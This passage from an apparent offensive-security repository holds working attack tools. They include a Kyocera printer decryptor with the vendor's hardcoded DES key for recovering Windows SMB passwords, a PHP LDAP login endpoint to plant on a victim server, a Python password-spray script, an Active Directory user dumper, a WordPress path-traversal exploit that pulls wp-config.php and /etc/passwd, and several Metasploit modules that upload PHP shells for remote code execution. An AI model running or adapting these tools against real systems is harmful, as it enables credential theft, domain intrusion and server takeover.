currentWordlist in "$WordlistsFolder"/*; 61 | do 62 | $currentWordlist=$(realpath "$currentWordlist") 63 | FILESIZE=`du -k "$currentWordlist" | cut -f1` 64 | if [[ "$FILESIZE" -gt "0" && "$FILESIZE" -le "3145728" ]]; 65 | then 66 | wordlist=$(basename "$currentWordlist" | sed 's/\(.*\)\..*/\1/') 67 | suffix="_small_straight.magcracked" 68 | seperator="_" 69 
| cracked_file=$OutputFolder$wordlist$suffix 70 | ./hashcat -m "$HashType" -w 3 --remove "$HashesFile" "$currentWordlist" -r "$RULE" -o "$cracked_file" -O 71 | ProfileSmall 72 | elif [[ "$FILESIZE" -gt "3145728" && "$FILESIZE" -le "314572800" ]]; 73 | then 74 | wordlist=$(basename "$currentWordlist" | sed 's/\(.*\)\..*/\1/') 75 | suffix="_medium_straight.magcracked" 76 | seperator="_" 77 | cracked_file=$OutputFolder$wordlist$suffix 78 | ./hashcat -m "$HashType" -w 3 --remove "$HashesFile" "$currentWordlist" -r "$RULE" -o "$cracked_file" -O 79 | ProfileMedium 80 | elif [[ "$FILESIZE" -gt "314572800" && "$FILESIZE" -le "3145728000" ]]; 81 | then 82 | wordlist=$(basename "$currentWordlist" | sed 's/\(.*\)\..*/\1/') 83 | suffix="_large_straight.magcracked" 84 | seperator="_" 85 | cracked_file=$OutputFolder$wordlist$suffix 86 | ./hashcat -m "$HashType" -w 3 --remove "$HashesFile" "$currentWordlist" -r "$RULE" -o "$cracked_file" -O 87 | ProfileLarge 88 | else 89 | echo "Seems $currentWordlist is too large" 90 | fi 91 | done 92 | -------------------------------------------------------------------------------- /kyocera/KyoceraAddressBookDecryptor.cs: -------------------------------------------------------------------------------- 1 | /* 2 | Exploiting printers to gain foothold on a domain. 
3 | Kyocera Comes with a pre-bundled Key and IV 4 | This utility seeks to create a threat model around the weak encryption and misconfiguration of features for abuse 5 | Tested via: 6 | - Kyocera ECOSYS M2640idw 7 | - Kyocera 4550i 8 | It obeys : RFC2898 9 | Author: Alien-within 10 | */ 11 | using System; 12 | using System.Collections; 13 | using System.Collections.Generic; 14 | using System.Diagnostics; 15 | using System.Security; 16 | using System.Security.Cryptography; 17 | using System.Text; 18 | using System.IO; 19 | using System.Linq; 20 | ​ 21 | public class Alienwithin 22 | { 23 | public static void Main(string[] args) 24 | { 25 | System.Console.WriteLine("#################################################"); 26 | System.Console.WriteLine(" Kyocera AddressBook SMB Password Decryptor "); 27 | System.Console.WriteLine(" By Alien-Within "); 28 | System.Console.WriteLine("#################################################"); 29 | Console.WriteLine("Enter the value of SmbLoginPasswd field : "); 30 | string KyoceraSMBPass = Console.ReadLine(); 31 | try 32 | { 33 | DESCryptoServiceProvider AlienwithinDESProvider = new DESCryptoServiceProvider(); 34 | AlienwithinDESProvider.Mode = CipherMode.CBC; 35 | AlienwithinDESProvider.Padding = PaddingMode.None; 36 | var key = new byte[] { 0x41, 0xF4, 0xA3, 0x05, 0xF3, 0x8B, 0x46, 0x8F }; 37 | var iv = new byte[] { 0x01, 0x82, 0x0D, 0x0B, 0x38, 0x3E, 0xCB, 0x7C }; 38 | var data = StringToByteArray(KyoceraSMBPass.Trim()); 39 | 40 | MemoryStream AlienwithinMemoryStream = new MemoryStream(); 41 | 42 | CryptoStream CStream = new CryptoStream(AlienwithinMemoryStream, AlienwithinDESProvider.CreateDecryptor(key, iv), CryptoStreamMode.Write); 43 | CStream.Write(data, 0, data.Length); 44 | CStream.FlushFinalBlock(); 45 | Console.WriteLine(Encoding.Default.GetString(AlienwithinMemoryStream.ToArray())); 46 | 47 | } 48 | catch (Exception ex) 49 | { 50 | Console.WriteLine(ex.ToString()); 51 | } 52 | } 53 | public static byte[] 
StringToByteArray(string hex) { 54 | return Enumerable.Range(0, hex.Length) 55 | .Where(x => x % 2 == 0) 56 | .Select(x => Convert.ToByte(hex.Substring(x, 2), 16)) 57 | .ToArray(); 58 | } 59 | } 60 | -------------------------------------------------------------------------------- /kyocera/KyoceraAddressBookDecryptor.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/Scripts-Sploits/5c9fc60858725b27b3000bca47cbbcb9a0e0b058/kyocera/KyoceraAddressBookDecryptor.exe -------------------------------------------------------------------------------- /kyocera/Readme.md: -------------------------------------------------------------------------------- 1 | ### Exploiting Printers (Kyocera) 2 | This script would assist in a pentest scenario to abuse a printer feature found in Kyocera printers to gain access to Windows credentials. 3 | Kyocera printers contain an address book feature; within this feature an administrator can use one of two methods to transmit scanned documents: 4 | - Configure a send-to-e-mail destination. 5 | - Configure a Windows account to log in to the host and scan to an SMB folder. 6 | 7 | Tested on: 8 | - Kyocera ECOSYS M2640idw 9 | - Kyocera 4550i 10 | 11 | ## Setup 12 | Quite simple really: you can compile with the **csc.exe** utility in your .NET Framework installation. 13 | - Navigate 14 | ` KyoceraAddressBookDecryptor.cs` 15 | 16 | An example is below: 17 | `C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe KyoceraAddressBookDecryptor.cs` 18 | 19 | You also need to download [KNetViewer](https://www.kyoceradocumentsolutions.eu/en/products/software/kyocera-net-viewer.html) to be able to export the address book from the printer, as it is the network management tool for Kyocera printers used to perform maintenance operations on local and remote printers. 
20 | 21 | [Pre-compiled binary](https://github.com/alienwithin/Scripts-Sploits/blob/master/kyocera/KyoceraAddressBookDecryptor.exe?raw=true) for the decryptor provided just in case you're pressed for time. :-P 22 | 23 | ## Usage 24 | - Navigate to the path where you have saved this exe 25 | - Run `KyoceraAddressBookDecryptor.exe` 26 | - Paste the encrypted value from the SmbLoginPasswd field in the Address Book XML. 27 | 28 | A sample of the address book is below: 29 | 30 | ![Address Book Sample](https://raw.githubusercontent.com/alienwithin/Scripts-Sploits/master/kyocera/printer_xml_address_book.PNG) 31 | 32 | The decryption process is as easy as shown below: 33 | 34 | ![Using The Decryptor](https://raw.githubusercontent.com/alienwithin/Scripts-Sploits/master/kyocera/usage_sample.PNG) 35 | 36 | ## Presumed Threat Model 37 | 38 | ![Sample Threat Model](https://raw.githubusercontent.com/alienwithin/Scripts-Sploits/master/kyocera/workflow.PNG) 39 | Because the SMB password is recoverable by anyone who can export the address book, the scan-to-SMB account should be a dedicated, low-privilege account and access to the printer's management interface should be restricted. 40 | ## End 41 | -------------------------------------------------------------------------------- /kyocera/printer_xml_address_book.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/Scripts-Sploits/5c9fc60858725b27b3000bca47cbbcb9a0e0b058/kyocera/printer_xml_address_book.PNG -------------------------------------------------------------------------------- /kyocera/usage_sample.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/Scripts-Sploits/5c9fc60858725b27b3000bca47cbbcb9a0e0b058/kyocera/usage_sample.PNG -------------------------------------------------------------------------------- /kyocera/workflow.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/Scripts-Sploits/5c9fc60858725b27b3000bca47cbbcb9a0e0b058/kyocera/workflow.PNG 
-------------------------------------------------------------------------------- /ldap/bruteforce_interface.php: -------------------------------------------------------------------------------- 1 | 7 | 8 | @version 1.0.0 9 | @url : https://www.alien-within.com 10 | **/ 11 | error_reporting(0); 12 | $ldapconfig['host'] = 'LDAP_Server_IP e.g 172.x.x.x'; 13 | $ldapconfig['port'] = 'LDAP PORT eg. 389'; 14 | $ds=ldap_connect($ldapconfig['host'], $ldapconfig['port']); 15 | 16 | ldap_set_option($ds, LDAP_OPT_PROTOCOL_VERSION, 3); 17 | ldap_set_option($ds, LDAP_OPT_REFERRALS, 0); 18 | ldap_set_option($ds, LDAP_OPT_NETWORK_TIMEOUT, 10); 19 | 20 | $username = $_POST['username']; 21 | $password = $_POST['password']; 22 | if(isset($_POST['username'])){ 23 | if ($bind=ldap_bind($ds, $username, $password)) { 24 | echo("Login correct"); 25 | } else { 26 | 27 | echo "Login Failed: Please check your username or password"; 28 | } 29 | } 30 | ?> 31 | 32 | 33 | 34 | 35 | 36 | 37 |
38 | 39 | 40 | 41 |
42 | 43 | -------------------------------------------------------------------------------- /ldap/ldap_dump_users.php: -------------------------------------------------------------------------------- 1 | 7 | 8 | @version 1.0.0 9 | @url : https://www.alien-within.com 10 | **/ 11 | 12 | /* 13 | Basic Settings to setup to Connect 14 | - Hostname - IP of the LDAP Server 15 | - Domain name 16 | - ldap columns and alternative connection parameters 17 | - domain admin user and password to connect and bind with 18 | - base dn for users in the organization 19 | */ 20 | $ldap_hostname = "LDAP_Server_IP e.g 172.x.x.x"; 21 | $ldap_domain = "DOMAIN NAME e.g. EXAMPLE.COM"; 22 | $ldap_columns = NULL; 23 | $ldap_connection = NULL; 24 | $ldap_password = 'DOMAIN ADMIN PASSWORD'; 25 | $ldap_username = 'DOMAIN ADMIN USER'.$ldap_domain; 26 | $ldap_base_dn = "CN=Users,DC=EXAMPLE,DC=COM"; 27 | 28 | /* 29 | End Basic Settings to setup to Connect 30 | */ 31 | //------------------------------------------------------------------------------ 32 | // Connect to the LDAP server. 33 | //------------------------------------------------------------------------------ 34 | $ldap_connection = ldap_connect($ldap_hostname); 35 | if (FALSE === $ldap_connection){ 36 | die("

Failed to connect to the LDAP server: ". $ldap_hostname ."

"); 37 | } 38 | 39 | ldap_set_option($ldap_connection, LDAP_OPT_PROTOCOL_VERSION, 3) or die('Unable to set LDAP protocol version'); 40 | ldap_set_option($ldap_connection, LDAP_OPT_REFERRALS, 0); // We need this for doing an LDAP search. 41 | 42 | if (TRUE !== ldap_bind($ldap_connection, $ldap_username, $ldap_password)){ 43 | die('

Failed to bind to LDAP server.

'); 44 | } 45 | 46 | //------------------------------------------------------------------------------ 47 | // Get a list of all Active Directory users. 48 | //------------------------------------------------------------------------------ 49 | 50 | $search_filter = "(&(objectCategory=person))"; 51 | $result = ldap_search($ldap_connection, $ldap_base_dn, $search_filter); 52 | 53 | if (FALSE !== $result){ 54 | $entries = ldap_get_entries($ldap_connection, $result); 55 | if ($entries['count'] > 0){ 56 | $odd = 0; 57 | foreach ($entries[0] AS $key => $value){ 58 | if (0 === $odd%2){ 59 | $ldap_columns[] = $key; 60 | } 61 | $odd++; 62 | } 63 | 64 | echo ''; 65 | echo ''; 66 | $header_count = 0; 67 | foreach ($ldap_columns AS $col_name){ 68 | if (0 === $header_count++){ 69 | echo ''; 76 | } 77 | echo ''; 78 | for ($i = 0; $i < $entries['count']; $i++){ 79 | echo ''; 80 | $td_count = 0; 81 | foreach ($ldap_columns AS $col_name){ 82 | if (0 === $td_count++){ 83 | echo ''; 96 | } 97 | } 98 | echo ''; 99 | } 100 | echo '
'; 70 | }else if (count($ldap_columns) === $header_count){ 71 | echo ''; 72 | }else{ 73 | echo ''; 74 | } 75 | echo $col_name .'
'; 84 | }else{ 85 | echo ''; 86 | } 87 | if (isset($entries[$i][$col_name])){ 88 | $output = NULL; 89 | if ('lastlogon' === $col_name || 'lastlogontimestamp' === $col_name){ 90 | //$output = date('D M d, Y @ H:i:s', ($entries[$i][$col_name][0] / 10000000) - 11676009600); // Windows 91 | $output = date('D M d, Y @ H:i:s', ($entries[$i][$col_name][0] / 10000000) - 11644473600); // Linux 92 | }else{ 93 | $output = $entries[$i][$col_name][0]; 94 | } 95 | echo $output .'
'; 101 | } 102 | } 103 | ldap_unbind($ldap_connection); // Clean up after ourselves. 104 | ?> 105 | -------------------------------------------------------------------------------- /ldap/love_thy_script_ldap.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | __author__ = "Munir Njiru" 3 | __email__ = "munir@alien-within.com" 4 | __status__ = "Production" 5 | 6 | #LDAP password spray tool 7 | import requests 8 | import sys 9 | import warnings 10 | from requests.packages.urllib3.exceptions import InsecureRequestWarning 11 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 12 | ''' 13 | Basic Settings for the script: 14 | - url - location of the uploaded script to bruteforce 15 | - expression - failed login message 16 | - domain - Domain you are bruteforcing against if none or workgroup you can do \\ as the value 17 | ''' 18 | url = "URL to victim location of LDAP Bruteforce SCRIPT" 19 | expression = "Login Failed: Please check your username or password" 20 | domain= "Enter the Domain to attack followed by two backslashes e.g. VICTIM\\" 21 | ''' 22 | End of basic settings you can ignore below this point 23 | ''' 24 | def brute(username,password): 25 | data = {'username':domain+username,'password':password} 26 | r = requests.post(url,data=data, verify=False) 27 | if expression not in r.content : 28 | print "\n[+] The password is: ",password, "For the User: ",username 29 | result_file=open("results_brute_ldap_common.txt","a") 30 | account_found = username+":"+password+"\n" 31 | result_file.write(account_found) 32 | result_file.close() 33 | #sys.exit() - only uncomment this line if the script should stop on first successful login 34 | else: 35 | print str(password)+" is not a correct password for "+str(username) 36 | 37 | 38 | 39 | 40 | def main(): 41 | # change dictionary names to dictionaries of your choice for user and password. 
42 | words = [w.strip() for w in open("uniq_pass.txt", "rb").readlines()] 43 | for payload in words: 44 | usernames_file = [u.strip() for u in open("uniq_users.txt", "rb").readlines()] 45 | for eachuser in usernames_file: 46 | brute(eachuser,payload) 47 | 48 | 49 | if __name__ == '__main__': 50 | main() -------------------------------------------------------------------------------- /membership-simplified-for-oap-members-only-exploit.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import string 3 | import random 4 | from urlparse import urlparse 5 | 6 | print "---------------------------------------------------------------------" 7 | print "Wordpress Plugin Membership Simplified v1.58 - Arbitrary File Download\nDiscovery: Larry W. Cashdollar\nExploit Author: Munir Njiru\nWebsite: https://www.alien-within.com\nCVE-2017-1002008\nCWE: 23\n\nReference URLs:\nhttp://www.vapidlabs.com/advisory.php?v=187" 8 | print "---------------------------------------------------------------------" 9 | victim = raw_input("Please Enter victim host e.g. http://example.com: ") 10 | file_choice=raw_input ("\n Please choose a number representing the file to attack: \n1. Wordpress Config \n2. 
Linux Passwd File\n") 11 | if file_choice == "1": 12 | payload="..././..././..././wp-config.php" 13 | elif file_choice == "2": 14 | payload="..././..././..././..././..././..././..././..././etc/passwd" 15 | else: 16 | print "Invalid Download choice, Please choose 1 or 2; Alternatively you can re-code me toI will now exit" 17 | quit() 18 | slug = "/wp-content/plugins/membership-simplified-for-oap-members-only/download.php?download_file="+payload 19 | target=victim+slug 20 | def randomizeFile(size=6, chars=string.ascii_uppercase + string.digits): 21 | return ''.join(random.choice(chars) for _ in range(size)) 22 | 23 | def checkPlugin(): 24 | pluginExists = requests.get(victim+"/wp-content/plugins/membership-simplified-for-oap-members-only/download.php") 25 | pluginExistence = pluginExists.status_code 26 | if pluginExistence == 200: 27 | print "\nI can reach the target & it seems vulnerable, I will attempt the exploit\nRunning exploit..." 28 | exploit() 29 | else: 30 | print "Target has a funny code & might not be vulnerable, I will now exit\n" 31 | quit() 32 | 33 | def exploit(): 34 | 35 | getThatFile = requests.get(target) 36 | fileState = getThatFile.status_code 37 | breakApart=urlparse(victim) 38 | extract_hostname=breakApart.netloc 39 | randomDifferentiator=randomizeFile() 40 | cleanName=str(randomDifferentiator) 41 | if fileState == 200: 42 | respFromThatFile = getThatFile.text 43 | if file_choice == "1": 44 | resultFile=extract_hostname+"_config_"+cleanName+".txt" 45 | print resultFile 46 | pwned=open(resultFile, 'w') 47 | pwned.write(respFromThatFile) 48 | pwned.close 49 | print "Wordpress Config Written to "+resultFile 50 | else: 51 | resultFile=extract_hostname+"_passwd"+cleanName+".txt" 52 | pwned=open(resultFile, 'w') 53 | pwned.write(respFromThatFile) 54 | pwned.close 55 | print "Passwd File Written to "+resultFile 56 | else: 57 | print "I am not saying it was me but it was me! Something went wrong when I tried to get the file. 
The server responded with: \n" +fileState 58 | 59 | if __name__ == "__main__": 60 | checkPlugin() 61 | -------------------------------------------------------------------------------- /metasploit_modules/Readme.md: -------------------------------------------------------------------------------- 1 | This section contains Metasploit ports of the exploits, since it is easier to just do things with msf. 2 | 3 | >> * [mobile_app_native.rb](https://github.com/alienwithin/Scripts-Sploits/blob/master/metasploit_modules/mobile_app_native.rb) - Zen App Mobile Native <=3.0 (CVE-2017-6104) 4 | >> * [wp_webapp_builder.rb](https://github.com/alienwithin/Scripts-Sploits/blob/master/metasploit_modules/wp_webapp_builder.rb) - Wordpress Plugin webapp-builder v2.0 (CVE-2017-1002002) 5 | >> * [wp2android_file_upload.rb](https://github.com/alienwithin/Scripts-Sploits/blob/master/metasploit_modules/wp2android_file_upload.rb) - Wordpress Plugin wp2android-turn-wp-site-into-android-app v1.1.4 (CVE-2017-1002003) 6 | >> * [mobileapp_builder_by_wappress.rb](https://github.com/alienwithin/Scripts-Sploits/blob/master/metasploit_modules/mobileapp_builder_by_wappress.rb) - Wordpress Plugin mobile-app-builder-by-wappress v1.05 (CVE-2017-1002001) 7 | >> * [wp_easytouch_builder.rb](https://github.com/alienwithin/Scripts-Sploits/blob/master/metasploit_modules/wp_easytouch_builder.rb) - Wordpress Plugin mobile-friendly-app-builder-by-easytouch v3.0 (CVE-2017-1002000) 8 | -------------------------------------------------------------------------------- /metasploit_modules/mobile_app_native.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | require 'msf/core' 6 | class MetasploitModule < Msf::Exploit::Remote 7 | Rank = ExcellentRanking 8 | include Msf::Exploit::Remote::HTTP::Wordpress 9 | include 
Msf::Exploit::FileDropper 10 | def initialize(info = {}) 11 | super(update_info(info, 12 | 'Name' => 'WordPress Mobile App Native Remote File Upload Exploit', 13 | 'Description' => ' 14 | This module exploits an arbitrary PHP code upload vulnerability in the 15 | WordPress Mobile App Native <= 3.0. 16 | The vulnerability allows for arbitrary file upload and remote code execution. 17 | ', 18 | 'Author' => 19 | [ 20 | 'Larry W. Cashdollar', # Vulnerability discovery 21 | 'Munir Njiru ' # Metasploit module 22 | ], 23 | 'License' => MSF_LICENSE, 24 | 'References' => 25 | [ 26 | ['CVE', '2017-6104'], 27 | %w(EDB 41540), 28 | %w(WPVDB 8743), 29 | ['URL', 'https://www.alien-within.com/wordpress-mobile-app-native-exploit/'] 30 | ], 31 | 'Privileged' => false, 32 | 'Platform' => 'php', 33 | 'Arch' => ARCH_PHP, 34 | 'Targets' => [['Mobile App Native <= 3.0', {}]], 35 | 'DisclosureDate' => 'Feb 28 2017', 36 | 'DefaultTarget' => 0) 37 | ) 38 | end 39 | 40 | def check 41 | peer = "#{rhost}:#{rport}" 42 | uri = normalize_uri(target_uri.path) 43 | uri << '/' if uri[-1, 1] != '/' 44 | checkScript = send_request_raw('uri' => normalize_uri(wordpress_url_plugins, 'zen-mobile-app-native', 'server', 'images.php')) 45 | return Exploit::CheckCode::Appears if checkScript && checkScript.code == 200 46 | Exploit::CheckCode::Safe 47 | end 48 | 49 | def exploit 50 | peer = "#{rhost}:#{rport}" 51 | uri = normalize_uri(target_uri.path) 52 | p = payload.encoded 53 | shellName = 'alien' + rand_text_alpha(4 + rand(4)) + '.php' 54 | data = Rex::MIME::Message.new 55 | data.add_part( 56 | "", 57 | 'multipart/form-data', 58 | nil, 59 | "form-data; name=\"file\"; filename=\"#{shellName}\"" 60 | ) 61 | print_status("Uploading payload (#{p.length} bytes)...") 62 | res = send_request_cgi('method' => 'POST', 63 | 'uri' => normalize_uri(wordpress_url_plugins, 'zen-mobile-app-native', 'server', 'images.php'), 64 | 'ctype' => "multipart/form-data; boundary=#{data.bound}", 65 | 'data' => data.to_s) 66 | unless 
res 67 | print_error('Hi perpetrator, it seems the victim has a defiant gene') 68 | return 69 | end 70 | respShell = res.body 71 | respShell['http://example.com/server/images/'] = '' 72 | @shellLoc = normalize_uri(wordpress_url_plugins, 'zen-mobile-app-native', 'server', 'images', respShell.strip) 73 | print_status("Requesting #{@shellLoc}") 74 | res = send_request_cgi('uri' => @shellLoc) 75 | handler 76 | print_error('Payload failed to upload') if res && res.code == 404 77 | end 78 | end 79 | -------------------------------------------------------------------------------- /metasploit_modules/mobileapp_builder_by_wappress.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class MetasploitModule < Msf::Exploit::Remote 9 | Rank = ExcellentRanking 10 | 11 | include Msf::Exploit::Remote::HTTP::Wordpress 12 | include Msf::Exploit::FileDropper 13 | 14 | def initialize(info = {}) 15 | super(update_info(info, 16 | 'Name' => 'Wordpress Plugin mobile-app-builder-by-wappress v1.05 Remote File Upload Exploit', 17 | 'Description' => ' 18 | This module exploits an arbitrary PHP code upload vulnerability in the 19 | WordPress Mobile App Native <= 3.0. 20 | The vulnerability allows for arbitrary file upload and remote code execution. 21 | ', 22 | 'Author' => 23 | [ 24 | 'Larry W. 
Cashdollar', # Vulnerability discovery 25 | 'Munir Njiru ' # Metasploit module 26 | ], 27 | 'License' => MSF_LICENSE, 28 | 'References' => 29 | [ 30 | ['CVE', '2017-1002001'], 31 | %w(EDB 41540), 32 | %w(WPVDB 8772), 33 | ['URL', 'https://www.alien-within.com/wordpress-mobile-app-native-exploit/'] 34 | ], 35 | 'Privileged' => false, 36 | 'Platform' => 'php', 37 | 'Arch' => ARCH_PHP, 38 | 'Targets' => [['Wordpress Plugin mobile-app-builder-by-wappress v1.05', {}]], 39 | 'DisclosureDate' => 'Mar 7 2017', 40 | 'DefaultTarget' => 0) 41 | ) 42 | end 43 | 44 | def check 45 | peer = "#{rhost}:#{rport}" 46 | uri = normalize_uri(target_uri.path) 47 | uri << '/' if uri[-1, 1] != '/' 48 | checkScript = send_request_raw('uri' => normalize_uri(wordpress_url_plugins, 'mobile-app-builder-by-wappress', 'server', 'images.php')) 49 | if checkScript && checkScript.code == 200 50 | Exploit::CheckCode::Appears 51 | end 52 | Exploit::CheckCode::Safe 53 | end 54 | 55 | def exploit 56 | peer = "#{rhost}:#{rport}" 57 | uri = normalize_uri(target_uri.path) 58 | p = payload.encoded 59 | shellName = 'alien' + rand_text_alpha(4 + rand(4)) + '.php' 60 | data = Rex::MIME::Message.new 61 | data.add_part( 62 | "", 63 | 'multipart/form-data', 64 | nil, 65 | "form-data; name=\"file\"; filename=\"#{shellName}\"" 66 | ) 67 | print_status("Uploading payload (#{p.length} bytes)...") 68 | res = send_request_cgi('method' => 'POST', 69 | 'uri' => normalize_uri(wordpress_url_plugins, 'mobile-app-builder-by-wappress', 'server', 'images.php'), 70 | 'ctype' => "multipart/form-data; boundary=#{data.bound}", 71 | 'data' => data.to_s) 72 | unless res 73 | print_error('Hi perpetrator, it seems the victim has a defiant gene') 74 | return 75 | end 76 | respShell = res.body 77 | respShell['http://example.com/server/images/'] = '' 78 | @shellLoc = normalize_uri(wordpress_url_plugins, 'mobile-app-builder-by-wappress', 'server', 'images', respShell.strip) 79 | print_status("Requesting #{@shellLoc}") 80 | res = 
send_request_cgi('uri' => @shellLoc) 81 | 82 | handler 83 | 84 | print_error('Payload failed to upload') if res && res.code == 404 85 | end 86 | end 87 | -------------------------------------------------------------------------------- /metasploit_modules/wp2android_file_upload.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class MetasploitModule < Msf::Exploit::Remote 9 | Rank = ExcellentRanking 10 | 11 | include Msf::Exploit::Remote::HTTP::Wordpress 12 | include Msf::Exploit::FileDropper 13 | 14 | def initialize(info = {}) 15 | super(update_info(info, 16 | 'Name' => 'Wordpress Plugin wp2android-turn-wp-site-into-android-app Remote File Upload Exploit', 17 | 'Description' => ' 18 | This module exploits an arbitrary PHP code upload vulnerability in the 19 | WordPress Mobile App Native <= 3.0. 20 | The vulnerability allows for arbitrary file upload and remote code execution. 21 | ', 22 | 'Author' => 23 | [ 24 | 'Larry W. 
Cashdollar', # Vulnerability discovery 25 | 'Munir Njiru ' # Metasploit module 26 | ], 27 | 'License' => MSF_LICENSE, 28 | 'References' => 29 | [ 30 | ['CVE', '2017-1002003'], 31 | %w(EDB 41540), 32 | %w(WPVDB 8774), 33 | ['URL', 'https://www.alien-within.com/wordpress-mobile-app-native-exploit/'] 34 | ], 35 | 'Privileged' => false, 36 | 'Platform' => 'php', 37 | 'Arch' => ARCH_PHP, 38 | 'Targets' => [['Wordpress Plugin wp2android-turn-wp-site-into-android-app v1.1.4', {}]], 39 | 'DisclosureDate' => 'Mar 7 2017', 40 | 'DefaultTarget' => 0) 41 | ) 42 | end 43 | 44 | def check 45 | peer = "#{rhost}:#{rport}" 46 | uri = normalize_uri(target_uri.path) 47 | uri << '/' if uri[-1, 1] != '/' 48 | checkScript = send_request_raw('uri' => normalize_uri(wordpress_url_plugins, 'wp2android-turn-wp-site-into-android-app', 'server', 'images.php')) 49 | if checkScript && checkScript.code == 200 50 | Exploit::CheckCode::Appears 51 | end 52 | Exploit::CheckCode::Safe 53 | end 54 | 55 | def exploit 56 | peer = "#{rhost}:#{rport}" 57 | uri = normalize_uri(target_uri.path) 58 | p = payload.encoded 59 | shellName = 'alien' + rand_text_alpha(4 + rand(4)) + '.php' 60 | data = Rex::MIME::Message.new 61 | data.add_part( 62 | "", 63 | 'multipart/form-data', 64 | nil, 65 | "form-data; name=\"file\"; filename=\"#{shellName}\"" 66 | ) 67 | print_status("Uploading payload (#{p.length} bytes)...") 68 | res = send_request_cgi('method' => 'POST', 69 | 'uri' => normalize_uri(wordpress_url_plugins, 'wp2android-turn-wp-site-into-android-app', 'server', 'images.php'), 70 | 'ctype' => "multipart/form-data; boundary=#{data.bound}", 71 | 'data' => data.to_s) 72 | unless res 73 | print_error('Hi perpetrator, it seems the victim has a defiant gene') 74 | return 75 | end 76 | respShell = res.body 77 | respShell['http://example.com/server/images/'] = '' 78 | @shellLoc = normalize_uri(wordpress_url_plugins, 'wp2android-turn-wp-site-into-android-app', 'server', 'images', respShell.strip) 79 | 
print_status("Requesting #{@shellLoc}") 80 | res = send_request_cgi('uri' => @shellLoc) 81 | 82 | handler 83 | 84 | print_error('Payload failed to upload') if res && res.code == 404 85 | end 86 | end 87 | -------------------------------------------------------------------------------- /metasploit_modules/wp_easytouch_builder.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class MetasploitModule < Msf::Exploit::Remote 9 | Rank = ExcellentRanking 10 | 11 | include Msf::Exploit::Remote::HTTP::Wordpress 12 | include Msf::Exploit::FileDropper 13 | 14 | def initialize(info = {}) 15 | super(update_info(info, 16 | 'Name' => 'Wordpress Plugin mobile-friendly-app-builder-by-easytouch v3.0 Remote File Upload Exploit', 17 | 'Description' => ' 18 | This module exploits an arbitrary PHP code upload vulnerability in the 19 | WordPress Mobile App Native <= 3.0. 20 | The vulnerability allows for arbitrary file upload and remote code execution. 21 | ', 22 | 'Author' => 23 | [ 24 | 'Larry W. 
Cashdollar', # Vulnerability discovery 25 | 'Munir Njiru ' # Metasploit module 26 | ], 27 | 'License' => MSF_LICENSE, 28 | 'References' => 29 | [ 30 | ['CVE', '2017-1002000'], 31 | %w(EDB 41540), 32 | %w(WPVDB 8771), 33 | ['URL', 'https://www.alien-within.com/wordpress-mobile-app-native-exploit/'] 34 | ], 35 | 'Privileged' => false, 36 | 'Platform' => 'php', 37 | 'Arch' => ARCH_PHP, 38 | 'Targets' => [['Wordpress Plugin mobile-friendly-app-builder-by-easytouch v3.0', {}]], 39 | 'DisclosureDate' => 'Mar 7 2017', 40 | 'DefaultTarget' => 0) 41 | ) 42 | end 43 | 44 | def check 45 | peer = "#{rhost}:#{rport}" 46 | uri = normalize_uri(target_uri.path) 47 | uri << '/' if uri[-1, 1] != '/' 48 | checkScript = send_request_raw('uri' => normalize_uri(wordpress_url_plugins, 'mobile-friendly-app-builder-by-easytouch', 'server', 'images.php')) 49 | return Exploit::CheckCode::Appears if checkScript && checkScript.code == 200 50 | Exploit::CheckCode::Safe 51 | end 52 | 53 | def exploit 54 | peer = "#{rhost}:#{rport}" 55 | uri = normalize_uri(target_uri.path) 56 | p = payload.encoded 57 | shellName = 'alien' + rand_text_alpha(4 + rand(4)) + '.php' 58 | data = Rex::MIME::Message.new 59 | data.add_part( 60 | "", 61 | 'multipart/form-data', 62 | nil, 63 | "form-data; name=\"file\"; filename=\"#{shellName}\"" 64 | ) 65 | print_status("Uploading payload (#{p.length} bytes)...") 66 | res = send_request_cgi('method' => 'POST', 67 | 'uri' => normalize_uri(wordpress_url_plugins, 'mobile-friendly-app-builder-by-easytouch', 'server', 'images.php'), 68 | 'ctype' => "multipart/form-data; boundary=#{data.bound}", 69 | 'data' => data.to_s) 70 | unless res 71 | print_error('Hi perpetrator, it seems the victim has a defiant gene') 72 | return 73 | end 74 | respShell = res.body 75 | respShell['http://example.com/server/images/'] = '' 76 | @shellLoc = normalize_uri(wordpress_url_plugins, 'mobile-friendly-app-builder-by-easytouch', 'server', 'images', respShell.strip) 77 | print_status("Requesting 
